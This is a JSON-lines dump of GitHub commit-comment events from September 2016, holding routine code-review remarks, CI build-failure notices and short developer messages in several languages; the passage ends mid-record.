{"id":"4540879718","type":"CommitCommentEvent","actor":{"login":"nabsiddiqui"},"repo":{"name":"edkolev/promptline.vim"},"payload":{"comment":{"id":18965163,"position":null,"line":null,"path":null,"commit_id":"d20d4a22fef027f2048397153259b96501081932","created_at":"2016-09-09T15:55:56Z","updated_at":"2016-09-09T15:55:56Z","body":"Added more clear information for Fish Shell(older version referenced promptline.sh which does not match the rest of the commands using shell_prompt.sh).  Made clear what shell is being used for Bash/ZSH."}},"created_at":"2016-09-09T15:55:56Z"}
{"id":"4540885702","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965178,"position":null,"line":null,"path":null,"commit_id":"feb82bcc8257ac6e175bf12e8ea5c50f1008274e","created_at":"2016-09-09T15:57:06Z","updated_at":"2016-09-09T15:57:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 978](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13086&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:03:09"}},"created_at":"2016-09-09T15:57:06Z"}
{"id":"4540886901","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18965183,"position":7,"line":121,"path":"config/locales/en.yml","commit_id":"08738e1ed636ce086da923dcccda72740927d67d","created_at":"2016-09-09T15:57:19Z","updated_at":"2016-09-09T15:57:19Z","body":"@sonalkr132 It's opposite. After all versions are yanked, `not_hosted_notice` is shown. After 100 days more, `reserved_namespace` is shown. Please check [`Rubygem#pushable?`](https://github.com/rubygems/rubygems.org/blob/2646bea5e81012270d42988b957778f9f9606318/app/models/rubygem.rb#L184-L186), [`Rubygem#not_protected?`](https://github.com/rubygems/rubygems.org/blob/2646bea5e81012270d42988b957778f9f9606318/app/models/rubygem.rb#L270-L272) and [view logic](https://github.com/rubygems/rubygems.org/blob/50aa7dc8bd27eb5305da2a10664e9136f1bbe3da/app/views/rubygems/show.html.erb#L15-L19).\r\n\r\n    X more days\r\n\r\nThis days can be calculated when `not_hosted_notice` is shown. So it's miscue that whole message is applied to both."}},"created_at":"2016-09-09T15:57:19Z"}
{"id":"4540896611","type":"CommitCommentEvent","actor":{"login":"Vidadit"},"repo":{"name":"Vidadit/Vidya_Rfiles"},"payload":{"comment":{"id":18965210,"position":null,"line":null,"path":null,"commit_id":"7e911594ff4c32732d7765be2a38e36715a6fb08","created_at":"2016-09-09T15:59:09Z","updated_at":"2016-09-09T15:59:09Z","body":"Data Wrangling Exercise 1"}},"created_at":"2016-09-09T15:59:09Z"}
{"id":"4540898141","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965216,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T15:59:23Z","updated_at":"2016-09-09T15:59:23Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T15:59:23Z"}
{"id":"4540898512","type":"CommitCommentEvent","actor":{"login":"DanielCXT"},"repo":{"name":"Ludeon/RimWorld-PortugueseBrazilian"},"payload":{"comment":{"id":18965218,"position":null,"line":null,"path":null,"commit_id":"fb01466f4a9ddee20ecbd7e5d97d258cdc34ae98","created_at":"2016-09-09T15:59:27Z","updated_at":"2016-09-09T15:59:27Z","body":"Ok. Muito obrigado."}},"created_at":"2016-09-09T15:59:27Z"}
{"id":"4540900317","type":"CommitCommentEvent","actor":{"login":"mbostock"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":18965227,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-09T15:59:46Z","updated_at":"2016-09-09T15:59:46Z","body":"@caesarsol Per #285: There is no default export (and never was), so you were benefitting from a bug in an earlier version of Rollup that was upgraded in 1.6.27. You need to import topojson as a namespace:\r\n\r\n```js\r\nimport * as topojson from \"topojson\";\r\n```\r\n\r\nSee https://github.com/mbostock/topojson/blob/master/client.js for what is exported."}},"created_at":"2016-09-09T15:59:46Z"}
{"id":"4540901487","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965233,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T15:59:59Z","updated_at":"2016-09-09T15:59:59Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T15:59:59Z"}
{"id":"4540901984","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18965234,"position":null,"line":null,"path":null,"commit_id":"8963e8707914c4693c95abea8c63d8b89cb968eb","created_at":"2016-09-09T16:00:05Z","updated_at":"2016-09-09T16:00:05Z","body":"os_2.0_develop_signal_slot_bug (mbadams5) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8963e8707914c4693c95abea8c63d8b89cb968eb-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8963e8707914c4693c95abea8c63d8b89cb968eb-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T16:00:05Z"}
{"id":"4540905409","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965243,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T16:00:41Z","updated_at":"2016-09-09T16:00:41Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T16:00:41Z"}
{"id":"4540907044","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18965246,"position":null,"line":null,"path":null,"commit_id":"13513fb4c7734e79fc3f2304af2918cde6d7d630","created_at":"2016-09-09T16:00:58Z","updated_at":"2016-09-09T16:00:58Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-wordpress](https://slashzerop-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-09T16:00:58Z"}
{"id":"4540908978","type":"CommitCommentEvent","actor":{"login":"RyanHTR"},"repo":{"name":"RyanHTR/Agenda"},"payload":{"comment":{"id":18965249,"position":null,"line":null,"path":null,"commit_id":"f53bf3ec59805b077c179e2afc479fcb1ab5db26","created_at":"2016-09-09T16:01:21Z","updated_at":"2016-09-09T16:01:21Z","body":"快带我吃香锅\n\n2016-07-11 18:18 GMT+08:00 sysu-shey <notifications@github.com>:\n\n> 到此一游\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JerryHTR/Agenda/commit/f53bf3ec59805b077c179e2afc479fcb1ab5db26#commitcomment-18192412>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe/AKbzAuX0xleIvxtwT3buMXwRugB4pQ22ks5qUhiFgaJpZM4JJORG>\n> .\n>\n"}},"created_at":"2016-09-09T16:01:21Z"}
{"id":"4540911840","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"alepuccetti/scope"},"payload":{"comment":{"id":18965253,"position":4,"line":53,"path":"circle.yml","commit_id":"2b31975a4c0d053a1cd04a9d6de199ec537ed125","created_at":"2016-09-09T16:01:49Z","updated_at":"2016-09-09T16:01:49Z","body":"You need to build with the proper tag. As an example, see how it's done for the main image:\r\n- https://github.com/weaveworks/scope/blob/master/Makefile#L33\r\n- https://github.com/weaveworks/scope/blob/master/Makefile#L48\r\n\r\nBelow, you use `$(./tools/image-tag)` but you don't create that tag?"}},"created_at":"2016-09-09T16:01:49Z"}
{"id":"4540921087","type":"CommitCommentEvent","actor":{"login":"bjhargrave"},"repo":{"name":"seanbright/bndtools"},"payload":{"comment":{"id":18965277,"position":69,"line":706,"path":"bndtools.core/src/bndtools/views/repository/RepositoriesView.java","commit_id":"bc423025c675cb3348f761fa0e647c42c53d40db","created_at":"2016-09-09T16:03:28Z","updated_at":"2016-09-09T16:03:28Z","body":"This will need to be changed due to changes in Workspace. It should be:\r\n\r\n```java\r\nworkspace.getOffline().set(offlineAction.isChecked());\r\n```"}},"created_at":"2016-09-09T16:03:28Z"}
{"id":"4540923769","type":"CommitCommentEvent","actor":{"login":"Kalam95"},"repo":{"name":"Kalam95/My_Progs"},"payload":{"comment":{"id":18965290,"position":null,"line":null,"path":null,"commit_id":"decadc491b16014f49d8ac372e245027f9af7b78","created_at":"2016-09-09T16:03:57Z","updated_at":"2016-09-09T16:03:57Z","body":"\r\nthis is the file containing programs related to array(for interview and coding test)"}},"created_at":"2016-09-09T16:03:57Z"}
{"id":"4540925263","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965295,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-09T16:04:15Z","updated_at":"2016-09-09T16:04:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 979](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13087&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 223, ignored: 3 Build time: 00:10:18\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-09T16:04:15Z"}
{"id":"4540928576","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"alepuccetti/scope"},"payload":{"comment":{"id":18965312,"position":4,"line":53,"path":"circle.yml","commit_id":"2b31975a4c0d053a1cd04a9d6de199ec537ed125","created_at":"2016-09-09T16:04:54Z","updated_at":"2016-09-09T16:04:54Z","body":"I suggest to just add an additional line `docker tag weavescope-traffic-control-plugin weavescope-traffic-control-plugin:$(./tools/image-tag)` here. Note that it will need to be done in the same line, not in a new `-` because of the `parallel: true` below."}},"created_at":"2016-09-09T16:04:54Z"}
{"id":"4540934374","type":"CommitCommentEvent","actor":{"login":"OFactory"},"repo":{"name":"OFactory/SchokoFactory"},"payload":{"comment":{"id":18965328,"position":null,"line":null,"path":null,"commit_id":"36fdcd0f04ddb26b16cc536e8bea4940bebc4e5f","created_at":"2016-09-09T16:06:02Z","updated_at":"2016-09-09T16:06:02Z","body":"Die Klasse Factory ist eine Gute Idee!"}},"created_at":"2016-09-09T16:06:02Z"}
{"id":"4540936374","type":"CommitCommentEvent","actor":{"login":"studio6thave"},"repo":{"name":"nss-day-cohort-15/mastery-exercise-modern-javascript-lairdhousehold"},"payload":{"comment":{"id":18965339,"position":12,"line":12,"path":"Gruntfile.js","commit_id":"bf600336744958c9343421c7df1c827dc7f99e17","created_at":"2016-09-09T16:06:25Z","updated_at":"2016-09-09T16:06:25Z","body":"Gruntfile.js needs to reflect your current project and location of files. Angular is not being used. Remove it here. Also fix the location of your js files."}},"created_at":"2016-09-09T16:06:25Z"}
{"id":"4540936831","type":"CommitCommentEvent","actor":{"login":"olibre"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18965341,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-09T16:06:31Z","updated_at":"2016-09-09T16:06:31Z","body":"OK, je vais préparer la question pour StackOverflow ce week-end (faut faire attention à la forme afin d'éviter que des bureaucrates pensent que c'est hors sujet). Je la mettrai dans ce fil de discussion.\r\n\r\nEt lundi vers 14:00 l'un de nous pose la question. Je pense que le début d'après-midi est le meilleur moment de poser une question sur SO : Amérique se réveille, Europe/Afrique termine son déjeuner, Asie ne dort pas encore). J'ai déjà posé une question un week-end et très peu de personnes la lisait (et personne ne répondait). \r\n\r\nMerci de ta remarque sur la précision. Faudrait que je révise le fonctionnement des flottants pour que je comprenne bien cette subtilité..."}},"created_at":"2016-09-09T16:06:31Z"}
{"id":"4540938720","type":"CommitCommentEvent","actor":{"login":"menjvillalobos"},"repo":{"name":"menjvillalobos/myapp"},"payload":{"comment":{"id":18965347,"position":4,"line":4,"path":"app/views/welcome/index.html.erb","commit_id":"047eb378e3389850efb1977d62f2cea16fb3366e","created_at":"2016-09-09T16:06:52Z","updated_at":"2016-09-09T16:06:52Z","body":"deleted"}},"created_at":"2016-09-09T16:06:52Z"}
{"id":"4540940177","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/fibervent"},"payload":{"comment":{"id":18965353,"position":null,"line":null,"path":null,"commit_id":"92d032f892d3c913c894494366f366b3e94f3ea4","created_at":"2016-09-09T16:07:08Z","updated_at":"2016-09-09T16:07:08Z","body":"My logical mind has to improve a lot... Thanks! \r\nI hope it's well."}},"created_at":"2016-09-09T16:07:08Z"}
{"id":"4540944763","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt-microbit"},"payload":{"comment":{"id":18965361,"position":null,"line":null,"path":null,"commit_id":"ef4b06a0874c32bca230d57ee0fddfdac6a9369c","created_at":"2016-09-09T16:08:00Z","updated_at":"2016-09-09T16:08:00Z","body":"What is this commit?"}},"created_at":"2016-09-09T16:08:00Z"}
{"id":"4540947549","type":"CommitCommentEvent","actor":{"login":"Caio99BR"},"repo":{"name":"CyanogenMod/android_packages_apps_Settings"},"payload":{"comment":{"id":18965372,"position":null,"line":null,"path":null,"commit_id":"d41b8049f2fe076bb4e0726ea90e6d644208cd47","created_at":"2016-09-09T16:08:30Z","updated_at":"2016-09-09T16:08:30Z","body":"http://review.cyanogenmod.org/#/c/161292/"}},"created_at":"2016-09-09T16:08:30Z"}
{"id":"4540955789","type":"CommitCommentEvent","actor":{"login":"sonalkr132"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18965392,"position":7,"line":121,"path":"config/locales/en.yml","commit_id":"08738e1ed636ce086da923dcccda72740927d67d","created_at":"2016-09-09T16:10:07Z","updated_at":"2016-09-09T16:10:07Z","body":"```Ruby\r\ndef not_protected?\r\n    updated_at < 100.days.ago || created_at > 30.days.ago\r\n  end\r\n```\r\nI hope you are not mislead with `updated_at < 100.days.ago` :wink: When a version is yanked, [rubygem object is touched](https://github.com/rubygems/rubygems.org/blob/f2999d3858b3322fa456dc61618d05acccbb84f9/app/models/version.rb#L4).\r\nA gem is `not_protected` if `created_at` is sooner than 30 days (gem is less than one month old) **or** `updated_at` is older than 100 days (gem was yanked more than 100 days ago). I understand it is kinda backwards, read discussion about it [here](https://github.com/rubygems/rubygems.org/pull/1371#discussion_r71688515)."}},"created_at":"2016-09-09T16:10:07Z"}
{"id":"4540959465","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18965400,"position":null,"line":null,"path":null,"commit_id":"4b79c4c224d6e3aa5b596834af3fce8d40749afc","created_at":"2016-09-09T16:10:47Z","updated_at":"2016-09-09T16:10:47Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dSbCppgoQLadbs-H7G4KNQ"}},"created_at":"2016-09-09T16:10:47Z"}
{"id":"4540965146","type":"CommitCommentEvent","actor":{"login":"Kyslik"},"repo":{"name":"Kyslik/column-sortable"},"payload":{"comment":{"id":18965413,"position":null,"line":null,"path":null,"commit_id":"0b242518f926efd2e805da1047c7484579488d34","created_at":"2016-09-09T16:11:52Z","updated_at":"2016-09-09T16:11:52Z","body":"Bad import for Exception."}},"created_at":"2016-09-09T16:11:52Z"}
{"id":"4540970210","type":"CommitCommentEvent","actor":{"login":"curiousdannii"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":18965429,"position":null,"line":null,"path":null,"commit_id":"d9827a9b0acd337a00db5d33284823516273fc66","created_at":"2016-09-09T16:12:55Z","updated_at":"2016-09-09T16:12:55Z","body":"The Travis log looks beautiful now, thanks! :tada: "}},"created_at":"2016-09-09T16:12:55Z"}
{"id":"4540977403","type":"CommitCommentEvent","actor":{"login":"nyradr"},"repo":{"name":"nyradr/decc"},"payload":{"comment":{"id":18965440,"position":null,"line":null,"path":null,"commit_id":"18f6dcae98e091f3e5bd68093cdeb635697299a3","created_at":"2016-09-09T16:14:18Z","updated_at":"2016-09-09T16:14:18Z","body":"Node code need to be changed"}},"created_at":"2016-09-09T16:14:18Z"}
{"id":"4540978592","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18965447,"position":null,"line":null,"path":null,"commit_id":"32a6722cdac7fe23235db73774f1ba2011e49e9a","created_at":"2016-09-09T16:14:32Z","updated_at":"2016-09-09T16:14:32Z","body":"@wolfreak99 no, we are not close"}},"created_at":"2016-09-09T16:14:32Z"}
{"id":"4540987364","type":"CommitCommentEvent","actor":{"login":"luix-git"},"repo":{"name":"luix-git/php1"},"payload":{"comment":{"id":18965466,"position":null,"line":null,"path":null,"commit_id":"78246bcec69883135e3d5f0297f0e359c1a2ecb6","created_at":"2016-09-09T16:16:15Z","updated_at":"2016-09-09T16:16:15Z","body":"111"}},"created_at":"2016-09-09T16:16:15Z"}
{"id":"4540989445","type":"CommitCommentEvent","actor":{"login":"ncalexan"},"repo":{"name":"ncalexan/datomish"},"payload":{"comment":{"id":18965469,"position":1,"line":1,"path":"src-browser/externs.js","commit_id":"2ff4550f8b908dab7957655668a0a5e2c0a1565b","created_at":"2016-09-09T16:16:40Z","updated_at":"2016-09-09T16:16:40Z","body":"License?  Included into something else, or only at build time?"}},"created_at":"2016-09-09T16:16:40Z"}
{"id":"4540991506","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965474,"position":null,"line":null,"path":null,"commit_id":"f9044ffa0cef49217f4d3c96ed853923101ea154","created_at":"2016-09-09T16:17:08Z","updated_at":"2016-09-09T16:17:08Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f9044ffa0cef49217f4d3c96ed853923101ea154-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T16:17:08Z"}
{"id":"4540991913","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"kinglozzer/sapphire"},"payload":{"comment":{"id":18965475,"position":null,"line":null,"path":null,"commit_id":"13c03af38d8a31c249f7bad1123fb5dd3aab3f73","created_at":"2016-09-09T16:17:13Z","updated_at":"2016-09-09T16:17:13Z","body":"My thought would be that we should probably cache by default (like we used to) and have a `MyObject::get()->fresh()->byID()` or something"}},"created_at":"2016-09-09T16:17:13Z"}
{"id":"4540992615","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18965477,"position":null,"line":null,"path":null,"commit_id":"4b79c4c224d6e3aa5b596834af3fce8d40749afc","created_at":"2016-09-09T16:17:20Z","updated_at":"2016-09-09T16:17:20Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bk26kOHMSqugrjTUasLuwg"}},"created_at":"2016-09-09T16:17:20Z"}
{"id":"4540993358","type":"CommitCommentEvent","actor":{"login":"BelminSalkica"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18965482,"position":null,"line":null,"path":null,"commit_id":"a5ae8772ccb606d17357f3c86b4f75b8b261c1da","created_at":"2016-09-09T16:17:28Z","updated_at":"2016-09-09T16:17:28Z","body":"Pozdrav, \r\nMalo kasnim sa zadaćom samo zbog toga što sam pokušavao puno stvari implementirat pa sam malo pretjerao...\r\nImam samo jedno pitanje nije mi jasno zašto mi se u table view kada dodam novi item u cell-u mi se ne poredaju labele kako su i ostale a kada ponovo uđem budu na mjestu na kojem bi trebale i biti..."}},"created_at":"2016-09-09T16:17:28Z"}
{"id":"4540994251","type":"CommitCommentEvent","actor":{"login":"wilmTap"},"repo":{"name":"jiscdev/analytics-udd"},"payload":{"comment":{"id":18965483,"position":null,"line":null,"path":null,"commit_id":"b1709ee98b9a1b6074685e1840cb713cc1f2ae30","created_at":"2016-09-09T16:17:38Z","updated_at":"2016-09-09T16:17:38Z","body":"Addresses issue #85 "}},"created_at":"2016-09-09T16:17:38Z"}
{"id":"4540994541","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965484,"position":null,"line":null,"path":null,"commit_id":"f9044ffa0cef49217f4d3c96ed853923101ea154","created_at":"2016-09-09T16:17:41Z","updated_at":"2016-09-09T16:17:41Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f9044ffa0cef49217f4d3c96ed853923101ea154-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T16:17:41Z"}
{"id":"4540995498","type":"CommitCommentEvent","actor":{"login":"Gigatek1"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":18965487,"position":null,"line":null,"path":null,"commit_id":"47e5948d1bc0e99cf26efe99f71145359adeadf4","created_at":"2016-09-09T16:17:53Z","updated_at":"2016-09-09T16:17:53Z","body":"This UAV quad-copter didn't have thermal before so thermal should easier to get now. I did this because of feedback from a team of regulars. I was told that they were owning because of the ease to spot new players (usually the ones that donate). It was against their past feeling about \"nerfing\" to report it but they said within 3 missions everyone had a UAV and a a few to spare. "}},"created_at":"2016-09-09T16:17:53Z"}
{"id":"4540997508","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965494,"position":null,"line":null,"path":null,"commit_id":"f9044ffa0cef49217f4d3c96ed853923101ea154","created_at":"2016-09-09T16:18:17Z","updated_at":"2016-09-09T16:18:17Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f9044ffa0cef49217f4d3c96ed853923101ea154-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T16:18:17Z"}
{"id":"4540999232","type":"CommitCommentEvent","actor":{"login":"jbcrail"},"repo":{"name":"Azure/azure-data-lake-store-python"},"payload":{"comment":{"id":18965504,"position":4,"line":47,"path":"adlfs/cli.py","commit_id":"eed2c47e537f8eaadb5c6ffcfc89ad703ac22fb0","created_at":"2016-09-09T16:18:35Z","updated_at":"2016-09-09T16:18:35Z","body":"@mcg1969 That's right."}},"created_at":"2016-09-09T16:18:35Z"}
{"id":"4541000845","type":"CommitCommentEvent","actor":{"login":"overnin"},"repo":{"name":"texttochange/vusion-backend"},"payload":{"comment":{"id":18965505,"position":21,"line":51,"path":"transports/apposit_ethiopia/apposit.py","commit_id":"fef5223ee39a324ce5b9fa73998ef55f570bf2b6","created_at":"2016-09-09T16:18:54Z","updated_at":"2016-09-09T16:18:54Z","body":"mark, you have to use the parameter provided by Apposit"}},"created_at":"2016-09-09T16:18:54Z"}
{"id":"4541001163","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965506,"position":null,"line":null,"path":null,"commit_id":"f9044ffa0cef49217f4d3c96ed853923101ea154","created_at":"2016-09-09T16:18:58Z","updated_at":"2016-09-09T16:18:58Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f9044ffa0cef49217f4d3c96ed853923101ea154-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-09T16:18:58Z"}
{"id":"4541001358","type":"CommitCommentEvent","actor":{"login":"fulyakoncu"},"repo":{"name":"fulyakoncu/E-ticaret"},"payload":{"comment":{"id":18965509,"position":null,"line":null,"path":null,"commit_id":"6101c6dc812519f4a2812c580e58420acf80ab0a","created_at":"2016-09-09T16:19:00Z","updated_at":"2016-09-09T16:19:00Z","body":"Elektronik ticaret uygulaması Microsoft Visual Studio.NET ortamında ASP .NET teknolojisi, C# programlama dili kullanılarak hazırlanmıştır.\r\nUygulamada veritabanı işlemleri için Microsoft SQL Server kullanılmıştır."}},"created_at":"2016-09-09T16:19:00Z"}
{"id":"4541002327","type":"CommitCommentEvent","actor":{"login":"agherzan"},"repo":{"name":"resin-os/meta-resin"},"payload":{"comment":{"id":18965512,"position":null,"line":null,"path":null,"commit_id":"acffe36536b33c3f73ca770105b9d3edcec4daae","created_at":"2016-09-09T16:19:12Z","updated_at":"2016-09-09T16:19:12Z","body":"Commit log should use the format we use in yocto. Other than that LGTM"}},"created_at":"2016-09-09T16:19:12Z"}
{"id":"4541010318","type":"CommitCommentEvent","actor":{"login":"marieALaporte"},"repo":{"name":"austinmeier/ontology-of-plant-stress"},"payload":{"comment":{"id":18965530,"position":null,"line":null,"path":null,"commit_id":"89bc645ecaea5d38c84a4a907a178e49a8036803","created_at":"2016-09-09T16:20:48Z","updated_at":"2016-09-09T16:20:48Z","body":"@austinmeier This imports stuff is dedicated to create the files in your imports folder. I don't think that you should add the aps-diseases and upper-level  files here"}},"created_at":"2016-09-09T16:20:48Z"}
{"id":"4541011931","type":"CommitCommentEvent","actor":{"login":"dimitrinicolas"},"repo":{"name":"dimitrinicolas/marmottajax"},"payload":{"comment":{"id":18965537,"position":null,"line":null,"path":null,"commit_id":"815351fc8c72d4f0d2d4e6f333662264a29a8396","created_at":"2016-09-09T16:21:09Z","updated_at":"2016-09-09T16:21:09Z","body":"Hi !\r\n\r\nI wanted to rework all the library to keep it very very simple, I know that there can be more functions in an ajax library. The auto detection of formData as `parameters` is a very good idea, I did not think  about it.\r\n\r\nI thinked about auto json detection but this is not a so good idea because the response may be a json or not without the developer knows it and wanted to only get a string.\r\n\r\nAnd finaly I don't think that making a different library in another branch is a good idea, branches are for versionning of one concept. But if you want you can make an advanced ajax library in one of your repos and add a link to it in this readme like \"Advanced library right there : ...\"."}},"created_at":"2016-09-09T16:21:09Z"}
{"id":"4541013753","type":"CommitCommentEvent","actor":{"login":"alyxq"},"repo":{"name":"alyxq/newRepo"},"payload":{"comment":{"id":18965542,"position":3,"line":3,"path":"testLet.js","commit_id":"a037ed31d527033e51cda4219ca5d220a170bdd2","created_at":"2016-09-09T16:21:32Z","updated_at":"2016-09-09T16:21:32Z","body":"u ayx"}},"created_at":"2016-09-09T16:21:32Z"}
{"id":"4541014917","type":"CommitCommentEvent","actor":{"login":"psykokwak4"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18965546,"position":82,"line":66,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-09T16:21:46Z","updated_at":"2016-09-09T16:21:46Z","body":"Will those directories have suffix `-bundle`, such as `cisco_ios_xr-bundle`?"}},"created_at":"2016-09-09T16:21:46Z"}
{"id":"4541016923","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965552,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-09T16:22:11Z","updated_at":"2016-09-09T16:22:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 980](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13102&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T16:22:11Z"}
{"id":"4541018562","type":"CommitCommentEvent","actor":{"login":"seand9"},"repo":{"name":"seand9/lvm-openstack-adapters"},"payload":{"comment":{"id":18965558,"position":null,"line":null,"path":null,"commit_id":"208db6c1db19c792f9bdef8cf8915a701ac6ef0e","created_at":"2016-09-09T16:22:31Z","updated_at":"2016-09-09T16:22:31Z","body":"Looks like you have no route to host for your maven repository; if you’re behind a firewall make sure you have maven proxy settings configured.\r\n\r\nERROR] Plugin org.apache.maven.plugins:maven-clean-plugin:2.4.1 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host -> [Help 1]\r\n\r\nAlso as stated in the notes this is only tested with java 6; looks like you have java 7.\r\n\r\n\r\nFrom: alexwang03 